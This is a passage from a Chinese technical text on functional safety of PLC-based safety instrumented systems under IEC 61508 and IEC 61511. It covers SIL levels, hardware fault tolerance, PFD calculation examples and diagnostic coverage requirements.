。但在使用中应注意使各联锁回路问相互独立 ,并且在使用中还应考虑用于同 一 目的的多个联锁回路所具有的共因失效 。 4) 联锁系统设置时, 应将联锁的安全性与可靠性同时考虑, 即对于特定的联锁回路, 设 置时应具有一定的冗余能力 , 以避免由于硬件随机失效或系统故障时造成联锁功能无法执行 。 标准首次以强制的形式对不同的联锁回路所应具有的冗余进行了规定(见表4-6、表4-7)。 表 4-6 联锁回路中可编程逻辑运算器的最小硬件故障冗余要求 SIL 最小硬件故障冗余 SFF<60% SFF从 60% ~ 90% SFF>90% 1 1 0 0 2 2 1 0 3 3 2 1 4 特殊要求应用(见IEC61508) 注 SFF为安全故障分数(Safety Failure Factor, SFF)。 表 4-7 传感器最终执行机构及非可编程器件的最小硬件冗余要求 SIL 最小硬件故障冗余 SIL 最小硬件故障冗余 1 0 3 2 2 1 4 特殊应用要求(见IEC61508) 三个安全完整性水平在 ANSI/ISA-4.00.01— 1996标准中有所描述 , 修订标准 ANSI/ ISA84.00.01— 2004(IEC61511 1mod) 目前包括安全完整性水平4。安全完整性水平是 对系统性能的衡量标准 ,数字越大安全性能越好则按其要求规定的故障概率也越低 。标准所 提供的是评估和减轻风险的合理统一的方法 。妥善使用标准将引导用户在需要的地方进行花 销而在不需要的地方节约开支 。考虑到这一点 ,如果在不需要较高安全等级的地方 ,用户则 无需使用一个较高等级的安全系统 。 •SIL3逻辑解算器 。许多最终用户指定使用达到 SIL3等级的冗余逻辑解算器 。有大量 冗余的可编程逻辑解算器(通常称为安全可编程逻辑控制器) 经认证达到 SIL3等级 。然而 仅用这些逻辑解算器中的一个是无法建立一个 SIL3系统的 , 一个系统包括传感器和终端设 备 ,许多项目都将实现冗余的逻辑解算器与非冗余的现场设备一起使用 ,其结果可能只达到 了 SIL1,毕竟系统这根链条的强度取决于它最薄弱环节的强度 。 事实上SIL3安全系统只有在非常特殊的情况下才可以不冗余 。在一个达到SIL3要求的 设计中 ,传感器 、逻辑解算器和终端设备(或执行机构) 几乎都是需要冗余的 。 IEC61511第11.4节叙述道: 硬件故障容差为 1时意味着 , 如有两个装置 , 其系统结 构应能在两个元器件中的一个或一个子系统发生危险故障的时候进行安全保护动作 。 故障容差必须应用于任何 SIL等级的现场仪表 ,其有关的规定已经清楚地定义在标准第 11.4.1节中 ,见表4-8。 表 4-8 现场硬件故障容差需要的 安全完整性水平 SIL 最低硬件故障容差 1 0 2 1 3 2 4 见IEC61508 最低硬件故障容差的减少已经定义成 , 减 少由于在 SIF(安全仪表功能) 设计中假设的 数字连同在各种工程应用中设备或子系统故障 率的不确定性而造成的 SIF设计潜在的缺陷 。 换而言之 ,规定最低故障容差等级将会防止使 用中出现极低的合格率 。 一个简短的人工测试 计算可以用来对提出的方案的设计性能进行测 试 。标准描述了在什么情况下故障容差要求可以降低一点 ,在什么情况下需要提高一点 。 当现场仪表经认证是具有较低等级的危险故障模 式 ,或当其硬件有详细的数据资料的情况下 ,诸如有故障率 、故障方式 、 内部自诊断的水平 等的详细资料时可以降低故障容差的要求 。 要满足终端设备特别是阀门这类的要求 ,难度特别大而且费用昂贵 。增加安全完整性等 级以恰当地维护和测试 ,对阀门的数量及阀门安装的复杂性有着重大的影响 ,如采用局部撞 击试验方法来提高性能 。 一个真正的 SIL3系统通常要求有三重变送器(三选二) 或1oo2D(带自诊断的二选一) 的逻辑解算器 。无论是三联阀门还是复式双联阀门 ,要完成局部撞击试验或是非常频繁的全 撞击试验通常是不可能的 。辅助变送器 、 阀门等增加了 SIL3系统的成本 , 还要考虑到如保险、供应、维护等操作因素。相比较而言,典型的 SIL2系统用不太复杂的逻辑解算器和根 据应用类型选择的单独或双重变送器和阀门 。 在许多情况下,重新设计危险性较低的程序比要求使用 SIL3安全系统更有效得多 。 SIL2将成为多数使用者最实际的系统等级 。 通用型 PLC仅适用于 SIL1等级的应用。以实际的经验三选二和二选一的通过 SIL3认 证的安全型 PLC相对于 SIL2等级来说,是过于安全的设计而且是不必要的开销。SIL3盒 式逻辑处理器不是安全设施的万能钥匙,仅仅使用 SIL3盒式逻辑处理器是不能保证整个系 统就能达到 SIL3要求的,也不意味着整体设计就符合行业标准的要求。对大部分应用而言,一般的安全完整性水平往往不会超过SIL2等级。使用目前经认证为SIL2等级的安全平台与类似控制平台相连接,能容易地完成系统的安全要求并降低生命周期成本 。 PLC控制系统的功能安全实现 5.1 工业控制系统的安全等级实现 5.1.1 功能安全的基本方法 5.1.1.1 遵守功能安全的端到端方法 安全相关系统与一般的自动化控制系统的最大区别 , 在于它在承担过程监控任务的同 时 ,承担了安全生产风险控制的任务 ,实际起到了风险降低的作用 。而功能安全标准采用端 到端的方法 ,将受控设备或系统的风险控制要求与安全相关系统的设计要求直接对接 , 是安 全相关系统实现风险控制的关键步骤 ,也是实现功能安全的重要方法 。 如图5-1所示 ,功能安全标准的端 到端方法 , 就是系统集成商在实施危险 控制的安全相关系统开发之初 , 就与用 户密切配合 , 对受控设备或系统进行系 统的危险识别和风险分析 , 根据风险分 析的结果确定实际风险 ,并将此实际风 险与可接受风险进行对比后 , 提出危险 控制的危险失效率的目标值 。从该目标 值 ,可以导出安全相关系统的目标安全 完整性等级 SIL要求 。 SIL是一种离散 的等级 (四种可能等级之一), 用于规 定分配给 E/E/PE安全相关系统安全功 能的安全完整性要求 , 在这里 , 安全完 整性等级 1是最低的 , 安全完整性等级 4是最高的 。SIL1表示使用该控制系统 能将受控设备或系统的风险降低 1级,SIL4表示使用该控制系统能将受控设备或系统的风险降低 4级 。 SIL不仅表明控制系统危 险失效率的目标量值 ,还表明了必须采取的技术与措施 。 图5-1清楚表明了用户 、系统集成商与安全专家的工作分工与配合 。用户专家对被控 对象最熟悉 ,也最能胜任风险分析提出安全控制要求的责任 , 系统集成商针对用户提出的要 求进行系统设计 ,初始设计完成后 ,还要将该系统放入整个风险评估对象中 ,重新评估风险 与可接受风险 ,最终完成系统设计 。 有统计资料表明, 在安全控制系统危险失效导致的事故中, 有 40%以上是由于安全要 求不明导致的 。功能安全标准采用的这种端到端的方法, 使风险分析与控制系统的目标设计 值直接对应 , 同时也使受控设备或系统的风险等级与控制系统能实现的风险降低级别直接对 应 。避免了因对受控设备或系统的危险认识不清 、安全要求不明造成的系统性危险失效 。 5.1.1.2 遵守功能安全的全系统方法 功能安全的全系统方法有效避免了随机失效, 它要求在设计和开发过程中采取有效措施 避免和控制失效, 严格满足结构约束条件与诊断覆盖率要求 ,用可靠性模型技术研究危险失 效概率, 采取措施在应用软件设计和开发过程中避免和控制失效 。 (1) 标准要求 。 为了防止设备故障导致的失效 , 系统集成商在设计集成系统 、选择所采用的所有器件 时, 必须全系统考虑每一种因素对系统危险失效的影响 。不仅要考虑系统中传感器单元 、逻 辑单元 、最终执行单元 , 以及它们之间的接口与连线等所有器件的随机危险失效率, 还要考 虑它们的结构与诊断 。IEC61508标准规定了安全完整性等级 (SIL) 与系统的结构约束及 诊断之间的关系 ,见表5-1。 表 5-1 IEC6158标准要求— 硬件安全完整性 B类安全相关子系统结构约束的要求 安全失效分数(SSF) 硬件故障裕度(HFT) 0 1 2 <60% 不允许 SIL1 SIL2 60%~<90% SIL1 SIL2 SIL3 90%~<99% SIL2 SIL3 SIL4 ≥99% SIL3 SIL4 SIL4 表5-1中, 硬件故障裕度 N 表示 N+1个故障将导致安全功能失效 。如果要求某子系 统的 SIL级别达3级, 在该子系统的安全失效分数为 90%~<99%的情况下 , 硬件故障裕 度就必须至少为1, 因此这个子系统结构可以选择为 1oo2, 想要提高可用性 , 还可以选择 2oo3随机失效完整性的定量评估与分配应该通过一个概率计算来进行 。计算建立在硬件组 件的失效率和失效模式等已知数据的基础上 。 因此, 传统的可靠性研究与实践中适用的数据 与方法 ,可以部分地适用于功能安全的研究与计算 。在IEC61508中规定了失效概率与 SIL 之间的关系 ,见表5-2。 表 5-2 IEC61508— 1要求— 安全完整性等级在低要求操作模式下分配给 一个 E/E/PE安全相关系统的安全功能目标失效概率 安全完整性等级 低要求操作模式(在要求时 就执行其设计功能要求的平均失效概率) 安全完整性等级 低要求操作模式(在要求时 就执行其设计功能要求的平均失效概率) 4 ≥10—5至<10—4 2 ≥10—3至<10—2 3 ≥10—4至<10—3 1 ≥10—2至<10—1 (2) 计算实例 。 首先举一个极端的例子 ,可以表明几个SIL3级的子系统简单组合并不能实现SIL3级系统 。 假设 有 一 个 SIL3级 的 传 感 器 子 系 统 , PFD=0.005; SIL3级 逻 辑 单 元 的 PFD 为 0.001; SIL2级的执行器的 PFD 为 0.007; 将它们简单组合为系统后 , 系统的 PFD 为: 0.005+0.001+0.007=0.013→ SIL2。 即实际系统的 SIL等级只能达到2级 。 为了便于理解 ,下面介绍一个系统 SIL计算与分配实例 。 假设有一个系统要求 SIL3级 , 由传感器单元 、逻辑单元 (PLC) 和最终执行单元 (执 行器) 两部分组成 。传感器单元的要求时的失效概率 (PFD) 占整个系统 PFD 的 30% , PLC占10%~20% ,执行器占50% 。计算确定传感器 、PLC和最终执行单元的结构配置与 失效率分配方案 。 1) 传感器单元的计算 。传感器单元的目标失效概率 PFD为 SIL3的30% → 3.0×10—4, 选择的传感器失效率λ=5.0×10—6; 危险失效率λD =安全失效率λs =0.5λ , 检验测试时间 间隔 TI=1年(8760小时), 共因失效因子 β=20% (见表5-3)。 表 5-3 传 感 器 单 元 计 算 表 结构 DC(诊断覆盖率) λDU = λD(1-DC) PFD= (λDU ×TI)/2 1oo1 0% 2. 5×10—6 1. 1×10—2(SIL1) 1oo1 90% 2. 25×10—6 1. 1×10—3(SIL2) 1oo2 90% 2. 25×10—6 PFD=β(λDU ×TI)/2=2.2×10—4 (<3.0×10—4→ SIL3) 由表5-3可知 ,传感器单元的诊断覆盖率(DC) 为 0时 ,该单元的 SIL值只能达到 1 级; 当 DC为90%时 , 系统结构未变 , 但 SIL能力就能达到 2级; 只有结构变化为 1oo2, 并且 DC达90%时 ,PFD才可能满足系统 SIL3的要求 。 因此 , 只有当传感器的 DC达到 90% (IEC61508规定 , 传感器考虑了 DC故障模型 、 漂移和振动等失效模式时 ,DC 可认为达到 90%), 传感器采用了输入比较/表决 (1oo2, 2oo3或更好的冗余) 的情况下 ,传感器单元才可能满足 SIL3级系统的要求 。 2) 逻辑单元计算 。逻辑单元的目标失效概率 PFD: SIL3的20%→ 2.0×10—4 , 检验测 试间隔 时 间 TI=1年 (8760小 时) 选 择 某 公 司 的 SNC 控 制 器 , 供 应 商 提 供 的 数 据 见表5-4。 表 5-4 逻辑单元的失效概率数据 结 构 SFF(安全失效分数) PFD 1oo2 99.95% 1. 86×10—6 该数据能够满足 SIL3级系统对逻辑单元的要求 。 3) 最终执行单元计算 。最终执行单元的目标失效概率 PFD: 50%的 SIL3→ 5.0×10—4 (见表5-5)。 选择阀门的数据: 失效率λ=5.0×10—6 ,λD =λs =0.5λ , DC=60%或80% ; 检验测试时间间隔 TI=1年(8760小时), β=20% 。 表 5-5 最终执行单元计算表 结构 DC(诊断覆盖率) λDU = λD(1-DC) PFD= (λDU ×TI)/2 1oo1 60% 1. 0×10—6 4. 38×10—3(SIL2) 1oo2 80% 0. 5×10—6 PFD =β(λDU ×TI)/2 =0.2×0.5×10—6 ×8760/2 =4.38×10—4 (5.0×10—4→ SIL3) 从表5-5可以看出 ,最终执行单元的结构必须至少选择1oo2,DC必须达到 80%以上, 才能保证 SIL3级系统的要求 。 4) 整个系统计算 。按照以上结构与配置 ,整个系统的计算见表5-6。 表 5-6 整 个 系 统 计 算 表 系统 PFD ΣλS ΣλDD ΣλDU 输入子系统 2. 2×10—4 2. 5×10—6 2. 25×10—6 0. 25×10—6 逻辑子系统 1. 86×10—6 6.4×10—6 1.42×10—6 4. 3×10—9 输出子系统 4. 38×10—4 2. 5×10—6 2.0×10—6 0. 5×10—6 整个系统 6. 6×10—4<1.0×10—3 11.4×10—6 5. 67×10—6 0. 76×10—6 5) 结果评价 。从表5-6可以看出 , 整个系统的 PFD 为 6. 6×10—4 , 符合IEC61508 标准要求的 SIL3的 PFD应小于1.0×10—3 的要求 ,见表5-2。 传感器单元 、逻辑单元和最终执行单元都选择 1oo2结构 , 它们的硬件故障裕度为 1, 也就是说 ,2个故障才会导致该子系统安全功能的丧失 。 安全失效分数 SFF为95.7% , 符 合IEC61508 2对 SIL3安全相关子系统的结构约束要求 ,见表5-2。 结论: 系统硬件失效率可量化部分的 SIL级别达到了 SIL3级要求 。 (3) 说明 。 从以上计算的过程可以看出 , 当用户提出 SIL3级功能要求时 , 系统集成商必须从整个 安全功能回路 ,通过严格的计算和分析 ,全系统地考虑功能安全问题 。首先必须确保目标失 效概率在 SIL3级允许的范围之内; 同时还要考虑系统结构 ,保证硬件故障裕度水平 , 即使 系统出现故障依然保持具备安全功能的能力; 还需要考虑每一个部件的安全失效分数和诊断 覆盖率 ,尽量减少诊断未检测到的危险失效率 。 5.1.1.3 遵守功能安全的全生命周期方法 功能安全标准用全生命周期的方法有效避免了安全相关系统的系统失效 。系统失效与质量管 理条件 、安全管理条件及技术安全条件相关 ,标准规定的全生命周期管理模型 ,在安全相关系统 的功能安全生命周期内 ,配备了一套完整的管理制度与程序 ,保证安全相关系统的功能安全。 图5-2清楚地表明了在安全相关系统的全生命周期内 , 用户 、 系统集成商 、设备供应 商各自的责任与工作内容 。分析阶段的工作 , 包括概念 、整体范围定义 、危险和风险分析 、 整体安全要求 、安全要求分配 ,都是最终用户的工作范围 。最终用户也可能会请专业的顾问 或顾问公司来完成这部分工作 。而实现阶段 , 包括整体计划编制 (包括整体安装和试运行 、 整体安全确认 、整体操作维护和修理)、 安全相关系统设计主要由系统集成商负责 ,但系统集成商在编制计划和设计的整个过程中, 需要与设备供应商 、最终用户密切配合 。最后的操 作阶段则主要由最终用户负责, 最终用户也可能会把操作业务整体交给承包商完成, 但所有 操作必须严格按照系统集成商在设计阶段制定的计划执行 。 图 5-2 IEC61508的生命周期模型 5.1.1.4 满足功能安全对数据资料的附加要求 从以上介绍和计算过程还可以看出 ,功能安全标准实施后 ,安全相关系统的用户 、 系统 集成商和设备供应商都必须注意到的一个很重要的方面是, 有一些数据资料是安全相关系统 设计 、编制确认与测试报告 、制定安全手册或功能安全评估认证时必须知道和获得的 。 因 此, 设备或系统供应商在向用户提供安全相关系统或设备时, 必须同时提交该设备或系统相 应的数据与资料 。 同样 ,用户在选择安全相关设备与系统时 ,也必须注意供应商能否提交相 应的数据资料 ,没有数据的设备 ,是无法应用在安全相关场合的 。 需要的数据与资料包括: (1)认证证书 。 按照IEC61508标准设计的硬件或软件, 必须提供标准的符合性认证证书 。在使用中验 证的硬件或软件, 则必须提供验证证据的评估结果 。 (2) 重要参数 。 硬件故障裕度(HFT), 安全失效分数(SFF), 失效率 (λ), 危险失效率 (λD), 安全 失效率 (λS), 内部诊断检测到的危险失效率 (λDD), 诊断未检测到的危险失效率 (λUD), 检验测试间隔(T1), 共因失效因子 β。 (3) 系统应用条件 。 系统操作模式 、应用环境等 。功能安全的端到端 、全系统和全生命周期的方法 ,是避免安全相关系统功能失效的重要保障 , 它涉及多项技术 、多个部门与组织 ,对相关人员的资格 能力提出了要求 。 同时 , 它还要求安全相关系统与设备的供应商提供相应的证明文件与失效 率数据 。这些都该引起我们的高度重视 。 5.1.2 安全相关系统安全等级设计 5.1.2.1 安全相关系统安全等级设计要求 安全相关的 E/E/PES与一般系统设计过程的基本差异 ,就在于系统设计的过程中要增加 SIL设计的内容 , 以确保 E/E/PES的设计和实现满足规定的安全功能和安全完整性要求 。 (1) SIL设计的基本原则及要求 。 SIL设计的基本原则之一 ,是采取一切必要的技术与措施保证要求的安全完整性 。 为了 实现安全完整性 ,必须同时满足 E/E/PES的随机安全完整性要求与系统安全完整性要求, 因为随机失效主要是硬件的随机失效 。 因此 ,分析时只提随机安全完整性就简化为硬件安全 完整性 。故障检测会影响系统的行为 , 因此 , 它与硬件以及系统的安全完整性都相关 。 图5-3表示进行 SIL设计时为达到要求的安全完整性 , 必须考虑的所有要求 。 以后各 章会分别予以介绍 。 图 5-3 安全完整性与各要求之间的关系 (2) 硬件安全完整性结构约束的要求 。 此要求对应图5-3的“ 结构约束 ” 框图 , 硬件安全完整性的安全功能所声明的最高安 全完整性等级 ,受限于硬件故障裕度和执行该安全功能的子系统的安全失效分数 。 在 IEC 61508中规定 ,对于 B类安全相关子系统的结构约束见表5-7。 表 5-7 B类安全相关子系统的结构约束(硬件安全完整性) 安全失效分数(SSF) 硬件故障裕度(HFT) 0 1 2 <60% 不允许 SIL1 SIL2 60%~<90% SIL1 SIL2 SIL3 90%~<99% SIL2 SIL3 SIL4 ≥99% SIL3 SIL4 SIL4 注 1.硬件故障裕度 N 表示 N+1个故障将导致安全功能的丧失 。 2.子系统的安全失效分数是子系统的平均安全失效率加检测到的平均危险失效率与子系统总平均失效率之比 。 3.满足以下任一条件 ,子系统可被视为 B类: (1) 至少一个组成部件的失效模式未被很好地定义; (2) 故障状况下子系统的行为不能完全确定; (3) 通过现场经验获得的可靠性数据不够充分 ,不足以显示出满足所声明的检测到的和未检测到的危险失效 的失效率 。 (3) 危险失效硬件失效概率的要求 。 此要求对应图5-3的“ 随机失效 ” 框图 ,需要估算由于随机硬件失效引起安全功能失 效的概率 。该概率应该等于或者低于安全要求规范中规定的目标失效概率 。 估算由于随机硬件失效造成的每个安全功能的失效概率应考虑以下因素: 1) 与所考虑的每个安全功能相关的 E/E/PE安全相关系统的结构 。 2) 在任何能造成 E/E/PE安全相关系统危险失效但能通过诊断测试检测到这个危险失 效的模式下 ,估算出的每个子系统的失效率 。 3) 在任何能造成 E/E/PE安全相关系统危险失效但不能通过诊断测试检测到这种危险 失效的模式下 ,估算出的每个子系统的失效率 。 4) E/E/PE安全相关系统对共同原因失效的敏感性 。 5) 诊断测试的诊断覆盖率和相关的诊断测试间隔 。 6) 用来揭露未被诊断测试检测到的危险故障而执行检验测试的间隔 。 7) 对已检测到的失效的修理时间 。 8) 任何数据通信过程中未检测到的失效的概率 。 对于每个安全功能 ,将 E/E/PE安全相关系统的可靠性分开进行量化是十分必要的 , 因 为使用了不同的部件失效模式 ,并且 E/E/PES的结构(根据冗余) 也可能改变 。 可以应用 的建模方法很多 ,选择最恰当的方法是分析员的事 ,要依赖于具体情祝 , 可采用的方法包 括: 因果图分析 、故障树分析 、马尔可大模型可靠性框图等 。 (4) 故障检测要求 。 此要求对应图5-3的“ 故障检测 ”框图 ,需要认真分析故障检测时对系统行为的要求, 以避免系统危险失效导致事故 。 在硬件故障裕度大于零的子系统中 ,对检测出的危险故障(通过诊断测试 、检验测试或 其他方法) 应采取的措施有: 某个规定动作达到或维持安全状态 ,或者隔离子系统的故障部 分 , 以允许 EL继续安全工作 , 同时修理故障部分 。如果在计算随机硬件失效概率时设定的 平均恢复时间(MTTR) 内未完成修理 ,那么应该采取某一规定的动作以达到或维持安全 状态 。 对于硬件故障裕度等于零以及安全功能完全依赖该子系统本身的子系统 , 当该子系统仅 在低要求模式下运行安全功能时 ,对检测出的危险故障应采取的措施有: 某个规定动作达到 或维持安全状态 , 或者在计算随机硬件失效概率时设定的平均恢复时间 (MTTR) 内 , 修 理故障子系统 。在此期间内 ,EUC的连续安全应通过附加措施和约束来保证 。这些措施和 约束提供的风险降低至少应等于无任何故障的 E/E/PES安全相关系统提供的风险降低 。应 在 E/E/PES操作和维护规程中对附加措施和约束进行规定 。 如果在规定的平均恢复时间 (MTTR) 内不能进行修理 ,那么应该采取其他规定的动作以达到或维持安全状态 。 对于硬件故障裕度大于零以及安全功能完全依赖该子系统本身的子系统 , 当该子系统在 高要求或连续操作模式下运行安全功能时 ,危险故障的检测(通过诊断测试 、检验测试或其 他方法) 将使规定的动作达到或维持安全状态 。 (5) 避免失效的要求 。 此要求对应图5-3的“ 避免失效 ” 框图 。此要求不适用于满足“ 经使用证实 ” 要求的 子系统 。 应使用一组恰当的技术和措施 ,用于在 E/E/PE安全相关系统硬件的设计和开发期内防 止引入故障 。根据所需的安全完整性等级 ,所选择的设计方法具有的特性应有助于: 1) 透明性 、模块化和控制复杂性的其他特性 。 2) 清晰和精确地表述: ①功能性; ②子系统接口; ③排序和时间关联信息; ④并发性 和同步化 。 3) 信息的通信和清晰 、准确的文档化 。 4) 验证和确认 。 为保证 E/E/PE安全相关系统的安全完整性能保持在所需的等级 ,在设计阶段就应将维 护要求规范化 。如适用 ,应使用自动测试工具和集成开发工具 。 设计期间 , 应编制 E/E/ PES的集成测试计划 。编制测试计划的文档应包括: 1) 所执行测试的类型和所遵循的规程 。 2) 测试环境 、工具 、配置和程序 。 3) 测试是否通过的准则 。 设计期间 , 开发者提出的可执行的活动 ,应该与在用户立场上所要求的活动加以区分 。 (6) 系统故障控制的要求 。 此要求对应图5-3中的“ 故障控制 ” 框图 。此要求不适用于满足“ 经使用证实 ” 要求 的子系统 。 为控制系统故障 ,E/E/PES的设计特点应使得 E/E/PE安全相关系统应能: 1) 如果不能排除硬件设计故障的可能性 ,容许硬件中的任何残余设计故障 。 2) 容许环境应力 ,包括电磁干扰 。 3) 容许 EUC操作员造成的失误 。 4) 容许软件中的任何残余设计故障 。 5) 容许任何数据通信过程中产生的错误和其他影响 。 在设计和开发活动中应考虑可维护性和可测试性 , 以便在最终的 E/E/PE安全相关系统 中实现这些属性 。E/E/PE安全相关系统的设计应充分考虑人员的能力和局限性 ,所有接口 的设计应根据良好的人员操作习惯并应适合操作者的认知能力和培训水平 。 安全相关系统设计的一个基本原则 ,是设计时应对操作者和维护人员所犯的可预见的致 命失误有充分认识 , 只要有可能都应能通过设计来防止和消除 ,或者在完成该动作之前对这 些动作进行一次确认 。 (7)设备“ 经使用证实 ” 的证据 。 此要求对应图5-3的“ 经使用证实 ”框图 。IEC61508制定时 ,充分考虑了当前安全控 制系统应用现状 ,对于有充分证据证明是安全的设备及系统 ,特别提出了本条要求 。 对于以往开发的子系统 , 只有在功能性规定明确 、有充分文档依据表明子系统的具体配 置此前确实应用过(使用时的所有失效记录均登记在册), 以及考虑过任何所需的附加分析 和测试时 ,才能被认为是经使用证实的子系统 。文档依据应显示 E/E/PE安全相关系统子系 统的任何失效(由随机硬件和系统故障造成) 的可能性足够低 ,可以达到使用子系统的安全 功能所需的安全完整性等级 。 为了确定任何未被检测到的系统故障的可能性足够低 ,可以达到使用子系统的安全功能 所需的安全完整性等级 ,要求的文档应显示出具体子系统以往的使用条件 , 与在 E/E/PE安全相关系统中子系统将要经历的条件相同或者非常接近 。 以往使用条件(操作行规) 包括可 能影响子系统硬件和软件内系统故障可能性的所有因素 , 例如环境 、使用模式 、执行的功 能 、配置 、与其他系统的接口 、操作系统 、翻译器 、人为因素 。 如果以往的使用条件与在 E/E/PE安全相关系统内将要经历的条件存在差异 ,应当对这 些差异加以标识 ,并结合恰当的分析方法和测试对这些差异进行明确地例示 , 以便确定任何 未被揭露出的系统故障的可能性足够低 , 以达到使用子系统的安全功能所需的安全完整性 等级 。 要求的文档证据应确定以往子系统的专用配置的使用程度(用工作小时表示) 在统计学 基础上足以支持所声明的失效率 。最低限度 ,需要足够的工作时间才能确立所声明的失效率 数据的置信度单边下限值至少能达到 70, 任何工作时间不超过一年的单个子系统在统计分 析中不作为计算总工作时间的一部分 。 在确定是否满足上述要求时 ,仅考虑以前的将子系统的全部失效有效地检测和报告的操 作 。在根据可用信息的广度和深度确定是否满足上述要求时 ,应考虑以下因素: 1) 子系统的复杂性 。 2) 子系统对降低风险所起的作用 。 3) 子系统失效产生的后果 。 4)设计的新颖性 。 为了设计一个 E/E/PE安全相关系统 ,如传感器 、执行器 、可编程控制设备及由这些设 备与子系统组成的系统 ,一般都需要以下几个基本步骤: 1) 确定安全功能所要求的安全完整性等级(SIL)。 2) 假设: 硬件安全完整性=系统安全完整性=SIL。 3) 对于硬件安全完整性 ,确定能够满足结构约束条件的结构并且证明由于随机硬件失 效引起的安全功能失效的概率能够满足要求的目标失效易 。 4) 对于系统安全完整性 ,选择实际操作中控制 (容许) 系统故障的设计特性或是证明 “ 经使用证实 ” 的要求已经得到满足 。 5) 对于系统安全完整性 ,选择在设计与开发中避免 (防止引入) 系统故障的技术和措 施或是证明“ 经使用证实 ” 的要求已经得到满足 。这些步骤把以上要求串了起来 。 因此 , 系 统 SIL设计的过程 ,就是满足以上提到的要求的过程 。 5.1.2.2 安全相关系统安全等级设计方法 (1) 提高诊断覆盖率的方法 。 1) 为了控制硬件失效 ,提高硬件 SIL等级 ,必须采取一系列技术与措施来检测故障与 失效 ,这些技术措施的有效性与诊断覆盖率各有不同 , IEC61508中列出了每一类部件需要 检测的故障或失效 。下面以机电装置 、 电子系统 、总线系统 、处理单元 、传感器和最终执行 单元对诊断及采用的技术与措施为例来说明这种差别方式 。 2) 对于机电装置 ,如电气子系统 ,可以通过在线监视检测失效 、继电器触点监视 、 比 较器 、多数表决器和无功电流原理来检测故障与失效 。对于检测了“ 未加电或断电 ”“触点 被熔接 ”这两类故障的设备 ,诊断覆盖率可判定为低(60%); 对于检测了“ 未加电或断电 ” “ 单个触点被熔接 ”这两类故障的设备 ,诊断覆盖率可判定为中(90%); 对于检测了“ 未加 电或断电”“ 各触点被熔接”“ 不可靠的导向触点 ”“不可靠的开启 ” 这四类故障的设备 ,诊断覆盖率可判定为高(99%)。 3) 对于电子系统 ,推荐采取在线监视检测失效 、 比较器 、多数表决器 、利用冗余硬件 进行测试 、动态原理 、访问端口和边界扫描结构的标准测试 、监视冗余 、带自动检验的硬 件 、模拟信号监视等诊断技术与措施来检测故障与失效 。对于I/O单元和接口 , 推荐采用 测试模式 、代码保护 、多通道平行输出 、监视输出与输入比较/表决等技术与措施来检测故 障与失效 。对于数据路径(内部通信), 推荐采用 1位硬件冗余 、多位硬件冗余 、完全硬件 冗余 、使用测试模式进行检查 、传输冗余与信息冗余等技术与措施来检测故障与失效 。对于 通风和加热系统 ,推荐采用温度传感器 、风扇控制 、来自温度传感器和条件报警的交错报 文 、强制风冷的连接和状态指示等技术与措施诊断故障与失效 。对于这些分离元件 ,检测了 “ stuck-at ”故障的设备 , 诊断覆盖率可判定为低 (60%); 检测了 “ DC故障模型 ” 和 “ 漂 移与振动 ” 的设备 ,诊断覆盖率可判定为高(99%)。 4) 对于总线系统 ,诊断了 “ 地址 stuck-at ”“ 数据或地址 stuck-at ”“ 无或连续访问 ” “ 仲裁信号stuck-at” 故障的总线 ,诊断覆盖率可判定为低 (60%); 诊断了“ 超时 ”“错误 的地址解码”“ 数据和地址的 DC故障模型”“ 访问时间错误”“ 无或连续仲裁 ” 故障的总线, 诊断覆盖率可判定为中(90%); 诊断了“ 超时”“ 错误的地址解码 ”“影响内存数据的所有 故障”“ 数据或地址错误”“ 访问时间错误 ”“无或连续仲裁 ” 故障的总线 ,诊断覆盖率可判 定为高(99%)。 5) 对于处理单元 、看门狗等 CPU单元 , 诊断了“ 数据和地址 stuck-at ”“错误编码或 不执行”“ stuck-at ”故障的单元 ,诊断覆盖率可判定为低 (60%); 诊断了“ 数据和地址的 DC故障模型”“ 错误编码或错误执行 ”“DC故障模型 ” 故障的单元 , 诊断覆盖率可判定为 中(99%); 诊断了“ 数据和地址的 DC故障模型 ”“ 内存单元的动态交叉 ”“无寻址 、错误 寻址或多重寻址”“ 未定义失效假设 ”“DC故障模型 ” 的处理单元 ,诊断覆盖率可判定为高 (99%)。 6) 对于中断处理单元 ,诊断了“ 无或连续中断 ” 故障的单元 , 诊断覆盖率可判定为低 (60%); 诊断了 “ 无或连续中断 ” “ 中断的交叉 ” 故障的单元 , 诊断覆盖率可判定为中 (90%)。 7) 对于不可变内存 ,诊断了“ 数据和地址固定故障 stuck-at ” 故障的单元 , 诊断覆盖 率可判定为低(60%); 诊断了“ 数据和地址的 DC故障模型 ” 故障的单元 , 诊断覆盖率可 判定为中(90%); 诊断了“ 影响内存数据的所有故障 ” 的单元 , 诊断覆盖率可判定为高 (99%)。 8) 对于可变内存 ,诊断了 “ 数据和地址固定故障 ” 的单元 , 诊断覆盖率可判定为低 (60%); 诊断了“ 数据和地址的 DC故障模型 ”“ 软错误引起的信息改变 ” 故障的单元 , 诊 断覆盖率可判定为中(90%); 诊断了“ 数据和地址的 DC故障模型 ”“ 内存单元的动态交 叉”“ 无寻址 、错误寻址或多重寻址”“ 软错误引起的信息改变 ”故障的单元 ,诊断覆盖率可 判定为高(99%)。 9) 对于传感器 ,诊断了“ 固定故障 ” 的单元 ,诊断覆盖率可判定为低(60%); 诊断了 “ DC故障模型”“ 漂移和振动 ”故障的单元 ,诊断覆盖率可判定为中(90%)。 10) 对于最终元件如执行器 ,诊断了“ 固定故障 stuck-at ” 故障的单元 ,诊断覆盖率可 判定为低(60%); 诊断了“ DC故障模型”“ 漂移和振动 ” 的单元 ,可判定为中(90%)。 SIL等级越高 ,要求的诊断覆盖率就越高 。 因此 SIL3级设备诊断的故障类型必定多于 SIL1级设备 ,采取的技术措施的有效性也一定高于 SIL1级系统 。 (2) 控制由硬件和软件设计引起失效的技术措施 。 1) 必须采用程序顺序监视技术 , 检测出有缺陷的程序序列 。该技术为 SIL1-v4级所极 力推荐的 。若不使用这种技术或措施 ,则应详细说明不使用的理由 。对于 SIL1级系统 , 可 采用程序顺序的时序或逻辑监视 ,但对于 SIL4级系统 , 就必须通过程序中的多个检测点进 行程序顺序的时序和逻辑监视 。 2) 应在利用在线监视检测失效 、利用冗余硬件进行测试 、访问端口和边界扫描结构的 标准测试 、代码保护 、多种硬件 、故障检测和诊断 、差错校验和纠错码 、失效断言编程 、安 全包技术 、多种程序设计等技术中至少选择一种 , 应用于控制硬件或软件设计引起的系统 失效 。 (3) 控制由环境用力或影响引起的失效 。 1) 必须采用防电压击穿 、 电压波动 、过电压 、低电压的措施 , 检测或允许一个电源引 起的失效; 必须分隔开电力线和信息线 , 